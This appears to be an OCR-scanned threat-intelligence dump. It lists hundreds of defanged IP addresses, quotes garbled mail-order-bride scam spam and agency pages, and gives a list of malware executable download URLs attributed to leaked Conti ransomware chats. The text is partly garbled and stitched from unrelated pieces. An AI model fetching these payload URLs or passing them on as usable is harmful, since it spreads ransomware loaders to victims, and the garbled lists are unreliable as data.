hxxp://68.67.51.65 
hxxp://2.8.171.11 
hxxp://3.3.1.3 
hxxp://68.32.145.82 
hxxp://12.6.1.19 
hxxp://5.7.1.179 
hxxp://17.7.3.184 
hxxp://2.4.4.184 
hxxp://3.5.9.181 
hxxp://3.4.18.177 
hxxp://3.2.7.175 
hxxp://3.5.1.119 
hxxp://1.3.2.74 
hxxp://8.7.2.45 
hxxp://195.99.111.193 
hxxp://2.4.1.51 
hxxp://12.119.8.234 
hxxp://1.3.34.26 
hxxp://9.5.15.173 
hxxp://76.188.146.197 
hxxp://17.4.2.41 
hxxp://11.5.113.57 
hxxp://151.53.23.52 
hxxp://1.3.6.9 
hxxp://63.78.244.29 
hxxp://22.5.1.44 
hxxp://2.2.6.87 
hxxp://1.1.1.22 
hxxp://2.2.1.37 
hxxp://2.8.191.12 
hxxp://173.162.246.5 


22221 


hxxp://5.2.1.129 
hxxp://5.1.4.119 
hxxp://152.22.85.22 
hxxp://149.152.42.141 
hxxp://144.121.123.33 
hxxp://1.3.33.17 
hxxp://68.186.34.4 
hxxp://162.33.177.119 
hxxp://162.33.179.176 
hxxp://12.12.2.2 
hxxp://216.215.115.154 
hxxp://1.4.2.1 
hxxp://1.6.3.1 
hxxp://6.5.61.2 
hxxp://47.47.36.38 
hxxp://1.31.36.19 
hxxp://1.1.1.31 
hxxp://1.7.45.16 
hxxp://1.1.8.1 
hxxp://3.5.8.14 
hxxp://1.2.11.2 
hxxp://1.2.11.1 
hxxp://1.16.47.1 
hxxp://71.42.245.12 
hxxp://2.19.4.32 
hxxp://2.1.8.6 
hxxp://8.7.1.45 
hxxp://47.19.188.114 
hxxp://31.13.195.187 
hxxp://5.3.138.1 
hxxp://2.8.111.14 
hxxp://69.248.86.194 
hxxp://66.231.5.138 
hxxp://9.3.13.26 
hxxp://1.4.4.1 
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The spam’s message: 


-My name is Aleksandra 


= 


Hobbies 

like sports and keep ft - any physkal activty makes me feel energedc and cheerful! | enjoy both 
walling around the city of Countryside, of playing volleyball on the beach fm a very creative person 
and | lke to read fashion magazines and of course | tke shopping |) - may | have such a ite fernmune 
weakness |) Seriously, | bebeve that a true lady must be stytsh at any momert | tke to watch a nke 
mowe - & may be a romantic comedy or a farnous blockbuster, depends on my mood at the moment)! 
would get much pleasure spending 3 quiet autuenn evereng with a book on my favonte sofa 

More About Me 

1Dm 8 fomantx and tender lady, but « never bothers me from having fun wih fnends and ining very 
active Mel! Tm loving and caning, and | feel so loevely vetncet soenebody very special to care abowt im 
land of easyempered and quiet person, you'l never see me arguing or crying at anybody. And | must 
ted you that all my fnends bebeve | being luck and success ) | guess Ml ove you 3 loss for luck 4 we 
meet one day |) 

ideal Relationship 

He must just love me -) My Prince is attractive and tender, a real knight for his perxess _ Do you 
bebeve in fary-tales 7 | wart fem to be rekable. attentive, honest, caring and tender | want to be a Mile 
woman im hes strong arms 


© 2007-2008 


"Good day, my gentleman! 


All love is probationary, a fact which frightens women and exhilarates men. I! believe 
that unarmed truth and unconditional love will have the final word in reality. | was born 
in a friendly, cultured family and would like to have the same family in my own life. I love 
nature, flowers, music, dancing. | like to receive guests at home and spend time with friends. 
| always try to use opportunity to travel and see new places in the world. | have a good, 
quite and merry character, don’t like argues and rows. | hope to meet a white man, Christian, 
clever. Besides | would like to meet a good person with a good sense of humor, who wants to 
create a good strong family. If you would be loved, love and be lovable. | am waiting for you 
http://iam-waiting4love .com/infinity/ 


Waiting for your mail 
Sveetiana B." 
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hxxp://1.1.28.1 
hxxp://6.2.39.1 
hxxp://1.16.61.1 
hxxp://24.144.176.113 
hxxp://15.2.1.3 
hxxp://12.16.3.57 
hxxp://4.3.9.62 
hxxp://71.175.87.23 
hxxp://24.72.196.39 
hxxp://12.5.5.5 
hxxp://12.2.1.171 
hxxp://7.1.3.41 
hxxp://5.5.3.61 
hxxp://12.2.12.1 
hxxp://5.6.6.232 
hxxp://3.1.2.41 
hxxp://5.9.7.72 
hxxp://7.3.2.54 
hxxp://98.174.112.164 
hxxp://6.8.2.3 
hxxp://1.8.3.212 
hxxp://1.4.8.2 
hxxp://24.253.154.235 
hxxp://3.6.1.27 
hxxp://76.19.123.216 
hxxp://9.6.2.168 
hxxp://12.9.2.6 
hxxp://13.5.1.2 
hxxp://2.8.73.2 
hxxp://12.229.219.146 
hxxp://162.33.179.11 
hxxp://162.33.179.85 
hxxp://95.1.31.91 
hxxp://1.2.1.7 
hxxp://2.3.25.112 
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hxxp://1.3.36.51 
hxxp://96.79.82.1 
hxxp://19.3.253.135 
hxxp://74.143.45.114 
hxxp://96.245.61.121 
hxxp://1.1.7.32 
hxxp://1.49.213.1 
hxxp://14.2.4.241 
hxxp://1.1.3.8 
hxxp://147.189.143.13 
hxxp://162.33.178.153 
hxxp://185.183.98.39 
hxxp://194.15.112.35 
hxxp://19.1.5.48 
hxxp://216.59.233.166 
hxxp://1.45.2.52 
hxxp://67.21.186.173 
hxxp://6.2.1.19 
hxxp://1.4.2.79 
hxxp://72.38.215.81 
hxxp://4.1.6.32 
hxxp://9.3.16.26 
hxxp://1.2.1.53 
hxxp://6.2.47.1 
hxxp://2.12.12.4 
hxxp://1.2.23.1 
hxxp://73.219.182.67 
hxxp://1.35.127.1 
hxxp://1.9.2.8 
hxxp://96.21.236.211 
hxxp://1.9.5.68 
hxxp://2.11.4.125 
hxxp://6.4.6.165 
hxxp://96.65.216.17 


hxxp://8.66.95.69 
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hxxp://216.167.156.34 
hxxp://162.33.179.47 
hxxp://7.12.4.14 
hxxp://24.129.147.114 
hxxp://6.7.1.42 
hxxp://8.2.1.3 
hxxp://3.8.5.29 
hxxp://2.8.31.13 
hxxp://2.2.51.84 
hxxp://2.1.3.127 
hxxp://2.5.8.27 
hxxp://3.9.141.25 
hxxp://1.1.83.99 
hxxp://1.1.2.2 
hxxp://12.1.3.147 
hxxp://1.16.33.1 
hxxp://162.33.177.216 
hxxp://162.33.179.216 
hxxp://1.4.15.1 
hxxp://31.13.195.85 
hxxp://96.79.75.149 
hxxp://192.69.177.218 
hxxp://162.33.179.67 
hxxp://99.137.181.124 
hxxp://33.2.5.11 
hxxp://11.1.1.42 
hxxp://64.121.165.57 
hxxp://17.3.1.34 
hxxp://3.9.9.46 
hxxp://7.5.1.5 
hxxp://2.9.1.3 
hxxp://162.33.179.16 
hxxp://162.33.179.213 
hxxp://24.224.198.133 
hxxp://75.48.48.9 
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hxxp://1.43.128.3 
hxxp://1.4.1.255 
hxxp://69.147.3.25 
hxxp://67.217.157.5 
hxxp://2.2.3.148 
hxxp://216.75.114.197 
hxxp://98.37.76.33 
hxxp://4.4.1.122 
hxxp://52.44.244.137 
hxxp://162.33.178.115 
hxxp://151.75.145.241 
hxxp://2.8.211.12 
hxxp://4.9.1.1 
hxxp://5.5.1.34 
hxxp://1.2.26.1 
hxxp://2.12.3.86 
hxxp://13.9.1.155 
hxxp://141.217.194.98 
hxxp://1.2.1.25 
hxxp://162.33.179.8 
hxxp://4.12.5.36 
hxxp://2.9.5.41 
hxxp://2.8.251.8 
hxxp://7.3.4.46 
hxxp://216.48.224.64 
hxxp://2.8.144.1 
hxxp://12.178.76.234 
hxxp://1.3.38.94 
hxxp://96.78.253.29 
hxxp://162.33.177.74 
hxxp://162.33.179.46 
hxxp://9.3.4.244 
hxxp://19.3.8.32 
hxxp://4.1.11.34 
hxxp://1.4.14.1 

22226 


hxxp://4.1.11.36 
hxxp://1.5.6.15 
hxxp://12.3.6.12 
hxxp://1.1.9.1 
hxxp://2.8.151.12 
hxxp://3.6.8.2 
hxxp://1.1.4.1 
hxxp://136.228.49.3 
hxxp://155.94.242.5 
hxxp://162.33.178.65 
hxxp://162.33.179.253 
hxxp://8.65.244.5 
hxxp://12.9.1.47 
hxxp://8.5.37.19 
hxxp://12.8.47.1 
hxxp://6.4.1.151 
hxxp://1.3.4.66 
hxxp://18.3.3.1 
hxxp://21.5.4.29 
hxxp://87.121.52.13 
hxxp://4.6.13.29 
hxxp://4.1.1.65 
hxxp://12.193.151.42 
hxxp://27.1.34.24 
hxxp://4.7.5.249 
hxxp://12.3.6.9 
hxxp://39.2.13.75 
hxxp://129.49.16.22 
hxxp://162.33.178.148 
hxxp://162.33.178.228 
hxxp://162.33.179.245 
hxxp://174.197.1.194 
hxxp://185.49.37.122 
hxxp://3.12.41.3 
hxxp://12.18.9.7 
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hxxp://65.122.198.42 
hxxp://8.8.1.225 
hxxp://66.218.255.244 
hxxp://17.4.79.51 
hxxp://192.26.129.2 
hxxp://14.3.47.1 
hxxp://1.9.1.15 
hxxp://6.75.6.74 
hxxp://2.21.24.34 
hxxp://1.2.18.5 
hxxp://2.1.1.3 
hxxp://24.142.151.198 
hxxp://2.8.66.18 
hxxp://12.23.78.254 
hxxp://3.1.1.1 
hxxp://3.3.4.29 
hxxp://1.31.38.54 
hxxp://9.1.2.233 
hxxp://3.1.9.5 
hxxp://216.83.74.247 
hxxp://19.3.4.121 
hxxp://19.2.1.1 
hxxp://21.5.3.235 
hxxp://9.5.4.29 
hxxp://2.4.2.1 
hxxp://1.4.14.2 
hxxp://3.4.8.2 
hxxp://1.1.25.1 
hxxp://6.7.3.55 
hxxp://3.7.1.13 
hxxp://72.11.11.72 
hxxp://7.4.1.14 
hxxp://1.1.1.132 
hxxp://8.1.1.3 
hxxp://12.1.1.4 
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hxxp://1.4.5.5 
hxxp://3.1.44.5 
hxxp://2.8.25.18 
hxxp://12.47.5.82 
hxxp://22.21.9.25 
hxxp://5.2.1.44 
hxxp://2.3.1.4 
hxxp://72.22.212.242 
hxxp://4.2.6.18 
hxxp://1.3.21.115 
hxxp://84.45.177.161 
hxxp://1.1.2.1 
hxxp://2.6.5.1 
hxxp://6.1.19.84 
hxxp://1.1.3.6 
hxxp://46.253.242.26 
hxxp://2.4.1.2 
hxxp://23.25.2.1 
hxxp://71.246.225.234 
hxxp://21.5.7.37 
hxxp://4.2.5.168 
hxxp://1.16.56.1 
hxxp://24.16.171.43 
hxxp://98.154.78.42 
hxxp://21.6.2.27 
hxxp://71.43.174.146 
hxxp://76.65.63.141 
hxxp://217.151.98.69 
hxxp://162.33.179.99 
hxxp://45.61.136.185 
hxxp://2.1.3.5 
hxxp://1.1.4.19 
hxxp://2.4.8.1 
hxxp://24.234.112.36 
hxxp://86.111.139.79 
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hxxp://217.114.218.18 
hxxp://162.33.178.34 
hxxp://195.216.219.71 
hxxp://162.33.177.219 
hxxp://31.13.195.71 
hxxp://87.121.52.195 
hxxp://72.83.228.231 
hxxp://4.65.5.65 
hxxp://73.49.214.196 
hxxp://4.4.4.126 
hxxp://67.186.248.34 
hxxp://1.5.6.17 
hxxp://4.9.1.72 
hxxp://4.5.4.2 
hxxp://3.4.2.2 
hxxp://12.247.87.114 
hxxp://81.145.138.66 
hxxp://145.253.246.74 
hxxp://72.139.64.246 
hxxp://162.55.32.153 
hxxp://71.96.198.98 
hxxp://174.197.4.91 
hxxp://5.3.1.47 
hxxp://1.2.25.1 
hxxp://65.175.144.81 
hxxp://6.7.6.213 
hxxp://4.5.146.1 
hxxp://198.237.92.65 
hxxp://12.47.142.34 
hxxp://3.11.2.63 
hxxp://5.1.219.93 
hxxp://37.4.253.84 
hxxp://1.2.1.2 
hxxp://1.3.34.7 
hxxp://24.117.241.226 
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hxxp://9.7.2.29 
hxxp://65.154.133.3 
hxxp://5.1.1.118 
hxxp://12.245.151.234 
hxxp://2.1.1.116 
hxxp://188.122.45.169 
hxxp://9.3.5.245 
hxxp://19.4.3.23 
hxxp://6.7.1.1 
hxxp://4.1.3.3 
hxxp://8.4.14.41 
hxxp://12.6.14.19 
hxxp://148.76.134.229 
hxxp://2.11.13.53 
hxxp://21.6.1.74 
hxxp://3.1.13.29 
hxxp://96.1.32.113 
hxxp://1.3.33.23 
hxxp://7.12.1.4 
hxxp://72.89.122.155 
hxxp://81.86.216.226 
hxxp://73.128.134.12 
hxxp://68.173.125.216 
hxxp://2.5.2.26 
hxxp://47.36.39.14 
hxxp://7.4.2.2 
hxxp://35.128.56.244 
hxxp://6.2.4.27 
hxxp://2.8.91.15 
hxxp://65.153.7.154 
hxxp://144.121.51.34 
hxxp://24.144.192.25 
hxxp://21.8.1.2 
hxxp://173.221.71.138 
hxxp://9.9.5.38 
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hxxp://6.1.1.35 
hxxp://1.1.1.2 
hxxp://12.1.7.61 
hxxp://9.4.1.28 
hxxp://4.6.1.6 
hxxp://2.2.5.1 
hxxp://1.4.32.1 
hxxp://2.4.4.75 
hxxp://1.1.21.1 
hxxp://176.251.74.15 
hxxp://7.6.5.1 
hxxp://64.253.175.134 
hxxp://76.184.199.146 
hxxp://19.3.1.43 
hxxp://8.7.1.32 
hxxp://3.9.1.171 
hxxp://6.2.18.1 
hxxp://185.117.73.184 
hxxp://21.2.16.59 
hxxp://7.8.6.17 
hxxp://5.5.2.197 
hxxp://2.2.4.35 
hxxp://1.1.5.1 
hxxp://1.1.3.7 
hxxp://1.4.3.3 
hxxp://24.98.34.197 
hxxp://2.1.6.9 
hxxp://1.3.1.1 
hxxp://67.8.51.65 
hxxp://11.2.2.3 
hxxp://7.1.1.3 
hxxp://7.2.2.92 
hxxp://11.2.6.179 
hxxp://17.4.2.1 
hxxp://2.1.28.1 
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The user is then asked to register at hifor-you .com/register.php followed by an email 
confirmation explaining how the agency/scam at ualadys .com (76.74.250.239 Email: 
Tyom13@aol.com) works: 


ee page| 
Register Now 


Marina T. 


66 | want him to be retabie and secure, sociable 
atentive, with 2 good sense of humor.” 


Send message e 


2007-2009 Contact Us Register for free 


"We view ourselves as more of MATCHMAKERS than a mere Introduction Company. We DO 
NOT BUY OR SELL addresses of Ladies from other agents. Rather, we take the time and effort 
to meet each Lady referred to us in person, interview her at length, checkout her credentials to 
make sure her intentions are proper, before she gets hosted as our client. It is this knowledge 
of the Ladies that allows us to select the right persons to introduce to each man. 
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hxxp://7.1.21.113 
hxxp://1.2.126.84 
hxxp://2.1.67.1 
hxxp://7.1.1.169 
hxxp://6.223.215.21 
hxxp://6.5.1.67 
hxxp://12.1.7.157 
hxxp://7.7.34.34 
hxxp://174.77.115.12 
hxxp://6.14.12.59 
hxxp://16.2.1.61 
hxxp://212.221.96.86 
hxxp://8.1.9.2 
hxxp://5.7.1.116 
hxxp://6.5.12.1 
hxxp://5.5.2.52 
hxxp://96.69.81.33 
hxxp://17.7.2.182 
hxxp://4.6.23.1 
hxxp://99.149.242.7 
hxxp://6.7.5.189 
hxxp://19.3.31.31 
hxxp://4.13.1.38 
hxxp://116.228.196.26 
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Ce ee = - 


Welcome to the Ukrainian Dating Agency! 
Ale yOur boObityg for a Ubramuan of Russian wile? 
Then you af the night piace 


Our ain ts single we are here to help you Begin ie you Gesire, create tarnaty with 
Te Ulsairian of Russian bride and be happy together Read more about cur mission 
You may search tor Utrairian or Russian bodes using otters. uch 33 age range. 
OCCUD ABN ANG fete BtOwse Bre HMOs aC 000s Of he best Utr mrean of Russian 
Webcams os 


Our Dranches 


About Agency You Rave an opportunity $2 become acquairted wih chosen Urainian or Russian 
WOMAN COMMeTesteC ate wi) yout Lady OF Sets fomare Gis tor Ner Espionry our proties 
of LaTamuan or Russian women is safe and easy for pou Sign Up Now 7 Ws easy and 
fee! 


Testencenats 


Testimonial: 


Compatibility is the KEY. Our formula is simple, yet highly productive: 

1. You fill out our profile, same as the Ladies 

2. Select the Ladies you would like to meet 

3. Until you have a predetermined amount of Ladies reply with a yes 

4. During your trip meetings are scheduled on a private, one-on-one setting, with an inter- 
preter to assist you (if you require one) We know that your time is limited when you go on 
trip. This is a very efficient selections process that saves your time and, in fact, allows you 
the extra time to really get to know the Ladies. 


All meetings are one-on-one. We do not organize socials that do not work. Our service 
is usually based upon a male clients access to time and his available budget. The normal 
procedure is for a client to look through our gallery of Ladies, select the Ladies for pre- 
qualification, and correspond with them by e-mail or phone, than arrange a one-on-one visit. 
Still others, after viewing the Ladies, decide that the best overall approach would be to simply 
go there and meet as many women as we can arrange for them to meet, and spend time with 
them before making a decision. 
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hxxp://139.62.57.118 
hxxp://139.62.57.227 
hxxp://139.62.59.229 
hxxp://139.62.59.87 
hxxp://139.62.59.86 
hxxp://139.62.59.124 
hxxp://139.62.59.31 
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hxxp://139.62.59.14 
hxxp://139.62.59.198 
hxxp://139.62.58.244 
hxxp://139.62.57.116 
hxxp://139.62.59.174 
hxxp://139.62.59.222 
hxxp://139.62.58.46 
hxxp://139.62.58.195 
hxxp://139.62.59.25 
hxxp://139.62.57.36 
hxxp://139.62.59.243 
hxxp://139.62.59.237 
hxxp://139.62.59.141 
hxxp://139.62.57.214 
hxxp://139.62.58.15 
hxxp://139.62.58.23 
hxxp://139.62.58.29 
hxxp://139.62.58.45 
hxxp://139.62.58.62 
hxxp://139.62.58.84 
hxxp://139.62.58.95 
hxxp://139.62.58.89 
hxxp://139.62.58.87 
hxxp://139.62.58.98 
hxxp://139.62.58.85 
hxxp://139.62.58.94 
hxxp://139.62.58.115 
hxxp://139.62.58.124 
hxxp://139.62.58.126 
hxxp://139.62.58.127 
hxxp://139.62.58.146 
hxxp://139.62.58.151 
hxxp://139.62.58.152 
hxxp://139.62.58.162 
hxxp://139.62.58.188 
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hxxp://139.62.58.198 
hxxp://139.62.58.212 
hxxp://139.62.58.226 
hxxp://139.62.58.229 
hxxp://139.62.58.252 
hxxp://139.62.66.77 
hxxp://52.97.133.216 
hxxp://216.171.94.67 
hxxp://13.35.193.39 
hxxp://52.112.193.13 
hxxp://216.171.94.39 
hxxp://216.171.94.44 
hxxp://216.171.94.93 
hxxp://216.171.94.95 
hxxp://216.171.94.96 
hxxp://216.171.94.133 
hxxp://172.24.2.8 
hxxp://23.19.227.186 
hxxp://34.233.187.38 
hxxp://98.143.95.83 
hxxp://64.139.73.173 
hxxp://172.217.4.238 
hxxp://45.128.156.27 
hxxp://52.97.141.88 
hxxp://52.112.192.139 
hxxp://66.228.239.132 
hxxp://66.228.239.133 
hxxp://66.228.239.137 
hxxp://66.228.239.151 
hxxp://66.228.239.157 
hxxp://4.2.4.154 
hxxp://6.1.1.28 
hxxp://192.254.69.178 
hxxp://172.25.168.125 
hxxp://65.162.42.254 
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hxxp://65.162.42.252 
hxxp://65.162.42.251 
hxxp://65.162.42.242 
hxxp://65.162.42.197 
hxxp://63.219.151.12 
hxxp://65.162.42.135 
hxxp://65.162.42.173 
hxxp://65.162.42.195 
hxxp://65.162.42.198 
hxxp://65.162.42.222 
hxxp://65.162.42.241 
hxxp://65.162.42.246 
hxxp://65.162.42.249 
hxxp://216.252.195.128 
hxxp://172.22.245.162 
hxxp://172.22.245.137 
hxxp://172.22.198.11 
hxxp://172.25.168.64 
hxxp://172.25.168.113 
hxxp://198.61.195.78 
hxxp://172.25.168.89 
hxxp://172.17.112.1 
hxxp://46.34.1.2 
hxxp://66.228.239.136 
hxxp://172.17.6.9 
hxxp://172.17.6.7 
hxxp://172.17.9.6 
hxxp://172.17.9.7 
hxxp://172.17.9.39 
hxxp://172.17.8.254 
hxxp://169.254.32.72 
hxxp://169.254.113.11 
hxxp://169.254.196.198 
hxxp://23.81.246.16 
hxxp://64.187.238.58 
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BM PERSONAL I PHOTO 


7 mo 
CREDITS VIDEO > 
CREDITS 
> -« 
Personal correspondence Photo services Video services 
Service guarantees delivery of your You may use photo-credits to send With this service you can watch videos 
letters to ladys you have written, quickly personal photos to a lady or receive the of ladies 
and efficiently. After your letter gets to photos that she sends specially for you 
the Lady's malibox we contact the lady From $4.80 Bags 
and invite her to come to our agency to From $3.95 Bag us 


pick up your letter already translated for 
her. 


m $6.95 Bisel se 


Toys and Chocolates Language lessons 


Flowers 


Also experiencing first-hand their environment and culture gives the man a future under- 
standing of his future bride. OUR PERSONAL INTRODUCTION TRIP HAS BEEN YEILDING 
A 95 % SUCCESS RATE! Again, the reason for this is the growing frustration among the 
Ladies about the lack of follow through the men, Consequently, many Ladies do not re- 
spond to letters, knowing that few ever follow through. They simply wait to meet the men 
who go there. THUS, THE SITUATION HAS BECOME A DREAM FOR THE MAN WHO ARE SERIOUS. 


During our Special Photoshoot Trips (e-mail for dates); you will get an opportunity to 
watch and meet new Ladies. Many times, clients pick these new Ladies because they are fresh 
and no one has ever met them before. We have quite a few Ladies who have never made it 
to the gallery because they got engaged immediately to the men who went no trips." 


The agency is also [4]reserving the right to forward the responsibility for any fraudulent 
activities to the girls, the majority of which do not exist at the first place in the following way: 


All scam patterns have similarities that are very easy to spot if you Know what to watch out 


for: 


¢ Usually the contact originates from a personals site where anyone can place his/her ad 
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hxxp://1.21.2.1 
hxxp://192.198.81.122 
hxxp://66.161.144.31 
hxxp://192.111.152.138 
hxxp://192.254.76.214 
hxxp://133.1.11.173 
hxxp://192.111.151.198 
hxxp://195.123.213.122 
hxxp://173.232.146.32 
hxxp://98.191.94.98 
hxxp://52.96.69.56 
hxxp://3.215.239.59 
hxxp://72.167.218.45 
hxxp://35.174.78.146 
hxxp://52.112.65.78 
hxxp://52.112.67.51 
hxxp://96.248.123.99 
hxxp://199.241.189.38 
hxxp://255.255.255.252 
hxxp://199.241.189.37 
hxxp://8.8.4.4 
hxxp://64.244.144.91 
hxxp://199.241.189.36 
hxxp://199.241.189.39 
hxxp://192.111.154.74 
hxxp://172.98.197.98 
hxxp://192.111.145.218 
hxxp://192.111.149.26 
hxxp://45.91.11.22 
hxxp://2.56.115.39 
hxxp://145.91.11.22 
hxxp://62.96.194.146 
hxxp://179.43.176.133 
hxxp://168.119.77.163 
hxxp://72.73.77.9 
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hxxp://82.69.71.9 
hxxp://82.65.84.9 
hxxp://185.212.129.112 
hxxp://172.31.255.255 
hxxp://172.22.9.18 
hxxp://172.22.9.5 
hxxp://172.22.9.3 
hxxp://172.22.9.17 
hxxp://172.22.9.196 
hxxp://172.22.9.2 
hxxp://172.22.9.24 
hxxp://172.22.9.9 
hxxp://69.84.159.94 
hxxp://172.96.143.178 
hxxp://192.254.79.154 
hxxp://172.22.9.58 
hxxp://65.74.138.197 
hxxp://172.82.162.66 
hxxp://5.199.174.223 
hxxp://199.192.183.66 
hxxp://172.24.36.6 
hxxp://172.22.26.173 
hxxp://89.41.182.28 
hxxp://5.181.156.69 
hxxp://194.135.33.241 
hxxp://74.119.217.58 
hxxp://85.237.217.157 
hxxp://185.163.45.17 
hxxp://194.135.33.12 
hxxp://185.99.133.137 
hxxp://194.15.112.174 
hxxp://51.89.128.195 
hxxp://64.44.139.45 
hxxp://89.41.182.21 
hxxp://172.83.155.132 
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hxxp://45.95.186.118 
hxxp://194.15.112.173 
hxxp://51.89.128.193 
hxxp://192.99.255.47 
hxxp://64.44.139.41 
hxxp://194.36.188.24 
hxxp://185.183.96.36 
hxxp://185.163.45.132 
hxxp://155.133.16.199 
hxxp://168.119.54.228 
hxxp://213.59.119.198 
hxxp://185.163.47.176 
hxxp://139.28.235.26 
hxxp://5.255.255.5 
hxxp://77.88.55.55 
hxxp://85.25.217.84 
hxxp://1.2.3.255 
hxxp://162.76.2.1 
hxxp://1.5.7.9 


Sample currently active malicious executable download locations obtained from publicly 
leaked internal Conti Ransomware gang communications include: 


hxxp://copyrightlive-ksa.com/Preview _Report.exe 
hxxp://ebeautytrade.com/calc.exe 
hxxp://37.1.209.181/2805/locker.exe 
hxxp://omegasystemsuae.com/Preview _Document.exe 
hxxp://copyrightlive-ksa.com/Preview _Document.exe 
hxxp://www.alkanzalzahabi.com/Preview _Document.exe 
hxxp://omegasystemsuae.com/Preview _Document.exe 
hxxp://shawigroup.com/Preview _Document.exe 
hxxp://copyrightlive-ksa.com/Preview _Document.exe 
hxxp://www.alkanzalzahabi.com/Preview Document.exe 
hxxp://shawigroup.com/Preview _Document.exe 
hxxp://copyrightlive-ksa.com/P32.exe 
hxxp://shawigroup.com/Preview _Document.exe 
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hxxp://allacestech.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://shawigroup.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://allacestech.com/Preview _Document.exe 
hxxp://globaluxrma.com/Preview _Document.exe 
hxxp://globaluxrma.com/Preview _Document.exe 
hxxp://shighil.com/Preview _Document.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://www.bsrdesigns.com/DocumentPreview.exe 
hxxp://91.235.129.41/P32.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://watchespower.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocumentPreview.exe 
hxxp://watchespower.com/DocumentPreview.exe 
hxxp://www.bsrdesigns.com/DocumentPreview.exe 
hxxp://watchespower.com/DocumentPreview.exe 
hxxp://91.235.129.41/P32.exe 

hxxp://91.235.129.41/P32.exe 
hxxp://alexandersqualitycleaners.com/DocumentPreview.exe 
hxxp://middletownfriedchickengyro.com/DocumentPreview.exe 
hxxp://91.235.129.41/P32.exe 
hxxp://dubaidreamsadventure.com/Document _Aerlingus.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://dubaidreamsadventure.com/Document _Aerlingus.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://dubaidreamsadventure.com/Document _Aerlingus.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://www.shiningshadowllc.com/Document _BritishAirways.exe 
hxxp://www.omegasystemsuae.com/Document _Aerlingus.exe 
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hxxp://www.omegasystemsuae.com/Document _Aerlingus.exe 
hxxp://www.omegasystemsuae.com/Document _Aerlingus.exe 
hxxp://www.omegasystemsuae.com/RalphLaurenDocument.exe 
hxxp://copyrightlive-uae.com/calc.exe 
hxxp://copyrightlive-uae.com/Idin.exe 
hxxp://copyrightlive-uae.com/DAFSDASD.exe 
hxxp://copyrightlive-uae.com/DocumentPreview.exe 
hxxp://www.almakaan.com/DocumentPreview.exe 
hxxp://copyrightlive-uae.com/DocumentPreview.exe 
hxxp://45.153.240.191/crypt/18554hs.exe 
hxxp://copyrightlive-uae.com/DocumentPreview.exe 
hxxp://copyrightlive-uae.com/PreviewDocument.exe 
hxxp://194.5.249.13/p32.exe 
hxxp://globaluxrma.com/ReviewDocument.exe 
hxxp://shawigroup.com/ReviewDocument.exe 
hxxp://bloomfieldholding.com/ReviewDocument.exe 
hxxp://bloomfieldholding.com/wp-content/ReviewDocument.exe 


hxxp://greenmountains.ae/YAS42.exe 


hxxp://greenmountains.ae/YAS42.exehxxp://copyrightlive-ksa.com/Preview _Report.exe 


hxxp://www.alkanzalzahabi.com/DocumentPreview.exe 
hxxp://copyrightlive-ksa.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://allacestech.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://nutritionprofoob.com/DocumentPreview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://alwasl-syria.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://allacestech.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 


hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
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hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/Setup.exe 
hxxp://www.omegasystemsuae.com/Setup.exe 
hxxp://www.omegasystemsuae.com/Setup.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://www.omegasystemsuae.com/DocumentPreview.exe 
hxxp://bloomfieldholding.com/DocumentPreview.exe 
hxxp://bloomfieldholding.com/PreviewDocument.exe 
hxxp://shawigroup.com/DuplicateFinder.exe 
hxxp://shawigroup.com/DuplicateFinder.exe 
hxxp://shawigroup.com/DuplicateFinder.exe 
hxxp://shawigroup.com/Doc-Print.exe 
hxxp://middletownfriedchickengyro.com/DocumentPreview.exe 
hxxp://middletownfriedchickengyro.com/Doc-Print.exe 
hxxp://middletownfriedchickengyro.com/DocumentPreview.exe 
hxxp://middletownfriedchickengyro.com/Doc-Print.exe 
hxxp://nutritionprofbob.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocPreview.exe 
hxxp://porceletta-ware.com/DocPreview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://porceletta-ware.com/DocPreview.exe 
hxxp://www.ottenbourg.com/Doc-Preview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
hxxp://nutritionprofbob.com/DocumentPreview.exe 
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hxxp://www.shiningshadowllc.com/Doc-Preview.exe 
hxxp://shighil.com/Doc-Preview.exe 
hxxp://violinstop.com/DocumentPreview.exe 
